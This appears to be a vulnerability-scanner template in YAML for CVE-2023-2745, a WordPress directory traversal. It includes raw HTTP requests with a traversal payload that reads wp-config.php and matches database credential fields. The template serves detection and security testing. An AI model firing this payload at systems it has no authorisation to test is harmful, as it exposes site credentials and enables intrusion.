55 lines
1.8 KiB
YAML
55 lines
1.8 KiB
YAML
id: CVE-2023-2745
|
||
|
||
info:
|
||
name: WordPress Core <=6.2 - Directory Traversal
|
||
author: nqdung2002
|
||
severity: medium
|
||
description: |
|
||
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
|
||
impact: |
|
||
This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
|
||
reference:
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2023-2745
|
||
- https://www.cvedetails.com/cve/CVE-2023-2745/
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
cvss-score: 6.1
|
||
cwe-id: CWE-22
|
||
metadata:
|
||
max-request: 3
|
||
framework: wordpress
|
||
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi
|
||
|
||
flow: http(1) && http(2)
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET / HTTP/1.1
|
||
Host: {{Hostname}}
|
||
|
||
matchers:
|
||
- type: dsl
|
||
dsl:
|
||
- 'contains(body, "/wp-content/plugins")'
|
||
internal: true
|
||
|
||
- raw:
|
||
- |
|
||
POST /wp-login.php HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Content-Type: application/x-www-form-urlencoded
|
||
|
||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||
|
||
- |
|
||
GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
|
||
Host: {{Hostname}}
|
||
|
||
matchers:
|
||
- type: dsl
|
||
dsl:
|
||
- 'contains_all(body_2, "DB_NAME", "DB_PASSWORD")'
|
||
- 'status_code_2 == 200'
|
||
condition: and
|
||
# digest: 4b0a00483046022100ce32b073284e04166ce876b9a6a16bc765f3e5745d23bc5993115598f48a869d022100aed9aa693ea8ede7510ca9a1750a24a3e6040921a33e6690aef4a0877f0a727e:922c64590222798bb761d5b6d8e72950 |